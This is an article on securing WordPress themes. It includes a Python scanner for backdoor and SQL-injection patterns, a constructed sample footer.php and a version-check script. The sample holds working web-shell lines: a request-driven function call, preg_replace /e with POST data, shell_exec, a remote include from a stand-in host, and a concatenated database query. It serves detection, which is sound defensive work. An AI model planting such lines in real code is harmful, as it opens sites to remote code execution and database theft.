If you think the WordPress theme you bought from a reputable developer is safe by definition, think again. And if you think that because your site is served over HTTPS it is therefore secure, think again: TLS protects the connection, not the code running behind it.
WordPress is the most popular CMS for personal and corporate sites, which means that any WordPress theme will face a steady stream of automated and manual attacks during its lifetime.
Cybersecurity experts warn that about 29% of all hacked WordPress sites are penetrated via a vulnerable theme. Add the capture of login credentials sent in clear text over insecure Wi-Fi networks to the picture and you get a messy scenario.
Secure Connection Is First Line of Defense
Many website administrators manage their sites on the go. If the login page is served over plain HTTP, an insecure or compromised public Wi-Fi connection reveals even the strongest password to anyone sniffing the network, because the credentials travel in clear text.
The first line of defense is to serve the login and admin area over HTTPS only (WordPress supports this with the FORCE_SSL_ADMIN constant in wp-config.php), so that credentials are never on the wire unencrypted. A VPN that encrypts all traffic from your desktop and mobile devices adds a second layer on untrusted networks, but be clear about what it covers: the tunnel protects the hop between your device and the VPN exit, not the hop from there to your site, so it complements HTTPS rather than replacing it.
This is only one of the mandatory precautions, however. You also need practices that spot malicious or vulnerable code early enough to prevent harm to your site and its visitors.
Check Origins of Any WordPress Theme
There are thousands of WordPress themes available, and hundreds of them have been vulnerable from the moment they were created. Themes downloaded from "free premium" or "nulled" sites are the usual carrier of deliberately planted backdoors.
A good way to avoid a hackable theme is to install only themes from the official WordPress.org theme directory. That does not mean these themes are never compromised, but at least they pass a review by the WordPress.org theme review team before they are listed. After that it is up to you to update the theme and apply patches as they are released.
Use Malware Scanner to Check Themes
Plenty of online tools scan a WordPress theme for vulnerabilities and unwanted code. VirusTotal, for instance, runs an uploaded theme archive through dozens of antivirus engines for free; keep in mind that it catches known web shells and backdoor signatures rather than custom or obfuscated code, and that anything you upload is shared with the VirusTotal community.
There are also WordPress plugins that check already installed themes for harmful code. Some of these security tools can tell you exactly where the problem is in the theme's source code and suggest a patch for the spotted vulnerability.
Be aware that most weaknesses in a given theme are not intentional. They are usually bugs and omissions for which a patch is available, but you still need to know that the problem exists in the first place.
Your WordPress Database Also Needs Attention
The tools above check your theme, and therefore your website, for security holes. Your WordPress database is equally important, as attackers use SQL injection through unsanitised input in a theme or plugin to read or modify it and plant malicious code (a rogue admin user, a script injected into post content or an option value). In theme code the usual root cause is a query built by string concatenation instead of $wpdb->prepare().
A good practice is to scan for the common mistakes novice site owners make when installing and setting up WordPress and their chosen theme. Tools such as WPScans offer free and paid plans to scan your theme and entire site for vulnerabilities, including the WordPress database, automatically.
Always bear in mind that no security or antivirus tool detects all threats. Use a combination of two or more malicious code scanners and follow the best practices above to avoid theme infections.
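What such a scanner actually looks for is easier to see in code. The Python script below is an added example written for this article, not a tool from the page or from any vendor named above. It walks a theme directory and flags the patterns that most often mark a backdoored theme (eval over a decoded blob, the old preg_replace /e trick, a dynamic call on request data, shell execution, remote includes, hex-escaped strings) and, tying in the database point from the previous section, request data reaching $wpdb without $wpdb->prepare(). The two sample PHP files are constructed for the demonstration and written to a temporary directory; the rule names and thresholds are choices made for this example, not a standard.

```python
import re
import tempfile
from pathlib import Path
from typing import List, NamedTuple

# Heuristic signatures for backdoored or badly written theme files. A hit means
# "read this file", not "this file is malicious": obfuscation tricks and unprepared
# database queries both show up in themes that otherwise look legitimate.
SUSPICIOUS_PATTERNS = {
    # eval() fed by a decoder is the classic shape of an injected backdoor
    "eval-of-decoded-payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\(", re.I),
    # the /e modifier made preg_replace() execute its replacement as PHP (removed in PHP 7)
    "preg_replace-e-modifier": re.compile(
        r"preg_replace\s*\(\s*['\"](.)(?:(?!\1).)*\1[a-zA-Z]*e[a-zA-Z]*['\"]"),
    # $var(...) called with attacker-controlled input: a one-line remote code execution shell
    "dynamic-call-on-request-data": re.compile(
        r"\$[A-Za-z_]\w*\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "shell-command-execution": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "remote-file-include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I),
    # long runs of \xNN escapes hide function names such as create_function from grep
    "hex-escaped-string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    # request data reaching $wpdb without $wpdb->prepare(): SQL injection into the WordPress database
    "unprepared-wpdb-query": re.compile(
        r"\$wpdb->(?:query|get_results|get_row|get_var|get_col)\s*\("
        r"(?:(?!prepare)[^;])*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
}


class Finding(NamedTuple):
    file: str
    line: int
    rule: str
    snippet: str


def scan_file(path: Path) -> List[Finding]:
    """Run every pattern over the whole file so multi-line statements are caught too."""
    text = path.read_text(errors="replace")
    lines = text.splitlines()
    findings = []
    for rule, pattern in SUSPICIOUS_PATTERNS.items():
        for match in pattern.finditer(text):
            line_no = text.count("\n", 0, match.start()) + 1
            findings.append(Finding(path.name, line_no, rule, lines[line_no - 1].strip()[:80]))
    return sorted(findings)


def scan_theme(theme_dir) -> List[Finding]:
    """Scan every PHP file below the theme directory, including subdirectories."""
    findings = []
    for php_file in sorted(Path(theme_dir).rglob("*.php")):
        findings.extend(scan_file(php_file))
    return findings


# Constructed sample: a parameterised query that the scanner must leave alone.
CLEAN_FUNCTIONS_PHP = r"""<?php
function sample_recent_posts_by_author() {
    global $wpdb;
    $author = isset($_GET['author']) ? (int) $_GET['author'] : 0;
    return $wpdb->get_results(
        $wpdb->prepare("SELECT ID, post_title FROM {$wpdb->posts} WHERE post_author = %d LIMIT 5", $author)
    );
}
"""

# Constructed sample: the kind of code a theme scanner should flag, one pattern per line.
BACKDOORED_FOOTER_PHP = r"""<?php
// constructed backdoor sample
if (isset($_REQUEST['f']) && isset($_REQUEST['c'])) {
    $f = $_REQUEST['f'];
    $f($_REQUEST['c']);
}
eval(base64_decode('ZWNobyAiaGVsbG8iOw=='));
preg_replace('/.*/e', $_POST['p'], '');
echo shell_exec('uname -a');
$k = "\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";
@include('http://example.invalid/payload.txt');
$posts = $wpdb->get_results("SELECT * FROM {$wpdb->posts} WHERE ID = " . $_GET['id']);
?>
<footer><?php wp_footer(); ?></footer>
"""


def build_sample_theme() -> Path:
    """Write the two constructed files into a temporary theme directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="sample-theme-"))
    (root / "functions.php").write_text(CLEAN_FUNCTIONS_PHP)
    (root / "footer.php").write_text(BACKDOORED_FOOTER_PHP)
    return root


if __name__ == "__main__":
    for f in scan_theme(build_sample_theme()):
        print(f"{f.file}:{f.line}  {f.rule:<30} {f.snippet}")
```

Point scan_theme() at wp-content/themes/<your-theme> to run it against a real theme. Every finding still has to be read by a person: shell_exec() in a deployment helper or a legitimately long hex string will show up too, which is exactly why the previous section says to combine scanners rather than trust one.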
Apply All WordPress Theme Updates Immediately
Security researchers use the term Window of Vulnerability for the time between a vulnerability becoming known (or exploitable) and the moment a patch is applied on your site. Vulnerabilities for which no fix is yet available are known as zero-day threats. Any WordPress theme might contain a zero-day vulnerability, and reputable WordPress developers strive to release a fix as fast as possible.
That is why you need to apply theme updates and patches as soon as they are released: every day you wait extends the period during which your site runs unprotected. Checking daily for updates to both your theme and the WordPress core is mandatory from a security point of view. Better still, let WordPress apply them for you (since version 5.5 the admin UI can auto-update individual themes and plugins), or script the check with WP-CLI: wp theme list --update=available shows what is pending and wp theme update --all installs it.
Also check the theme developer's track record to see whether they update and patch their templates regularly. It will save you a lot of effort and money, because you must replace any theme that loses support in the long term.
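A daily check boils down to reading each theme's installed version and comparing it with the latest release. As an added example (not part of the original article, WordPress or WP-CLI), the Python script below parses the style.css header that WordPress itself uses to identify a theme, compares versions numerically so that 1.10 correctly ranks above 1.9, and reports themes that have no update source at all, which is the unsupported-theme case warned about above. The three themes and the LATEST_VERSIONS table are constructed for the demonstration; in real use that table would come from the WordPress.org themes API or the vendor's changelog, which the example does not call.

```python
import re
import tempfile
from pathlib import Path

# WordPress reads a theme's identity and version from the comment header of its style.css;
# these are the real header keys, and the header layout used below is the one WordPress expects.
HEADER_KEYS = ("Theme Name", "Version", "Author")

# Constructed stand-in for the version lookup you would do against the WordPress.org themes
# API or the vendor's changelog; no network call is made in this example.
LATEST_VERSIONS = {
    "sample-blog": "1.10",
    "sample-shop": "2.0.0",
}


def parse_style_header(css_text):
    """Extract the header fields from the comment block at the top of style.css."""
    fields = {}
    for key in HEADER_KEYS:
        m = re.search(r"^\s*\*?\s*" + re.escape(key) + r"\s*:\s*(.+?)\s*$", css_text, re.M)
        if m:
            fields[key] = m.group(1)
    return fields


def version_key(version):
    """Compare versions numerically: '1.10' is newer than '1.9' and '2.0' equals '2.0.0',
    both of which a plain string comparison gets wrong."""
    parts = []
    for piece in version.strip().split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    while len(parts) > 1 and parts[-1] == 0:   # normalise trailing zeros so 2.0 == 2.0.0
        parts.pop()
    return tuple(parts)


def find_outdated(themes_dir, latest_versions):
    """Return (slug, installed, latest, status) for every theme directory under themes_dir."""
    report = []
    for style in sorted(Path(themes_dir).glob("*/style.css")):
        slug = style.parent.name
        installed = parse_style_header(style.read_text()).get("Version", "0")
        latest = latest_versions.get(slug)
        if latest is None:
            status = "no-update-source"   # nothing to compare against: nobody will patch this one
        elif version_key(installed) < version_key(latest):
            status = "outdated"
        else:
            status = "current"
        report.append((slug, installed, latest, status))
    return report


def build_sample_themes():
    """Write three constructed themes (one current, one outdated, one unsupported) to a temp dir."""
    root = Path(tempfile.mkdtemp(prefix="themes-"))
    headers = {
        "sample-blog": ("Sample Blog", "1.9"),
        "sample-shop": ("Sample Shop", "2.0"),
        "old-custom": ("Old Custom", "1.0"),
    }
    for slug, (name, version) in headers.items():
        (root / slug).mkdir()
        (root / slug / "style.css").write_text(
            f"/*\nTheme Name: {name}\nAuthor: Constructed Sample\nVersion: {version}\n*/\n"
            "body { margin: 0; }\n")
    return root


if __name__ == "__main__":
    for slug, installed, latest, status in find_outdated(build_sample_themes(), LATEST_VERSIONS):
        print(f"{slug:<12} installed {installed:<6} latest {str(latest):<6} {status}")
```

Run find_outdated() against wp-content/themes with a real version table to turn the "check daily" rule into a cron job; a theme reported as no-update-source is the one the paragraph above tells you to replace.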
Estimates are that over 99% of all hacked WordPress sites are compromised by automated malware scripts. Taking into account that nearly one third of WordPress vulnerabilities relate to poorly developed themes, you may decide to complement the methods above with a tool that hides your core WordPress files and theme paths, so that a scanning script cannot tell at first glance that the site runs WordPress or which theme it uses. Treat this as noise reduction, not a fix: a hidden path is still vulnerable to anyone who finds it.
This is a solution for advanced WordPress administrators, though, and the practices listed above provide an acceptable level of security for most WordPress themes. Also bear in mind that themes on a free WordPress.com account are a different case: you cannot upload third-party theme files there, and the themes on offer are maintained and patched by the host, so the scanning steps above do not apply to them.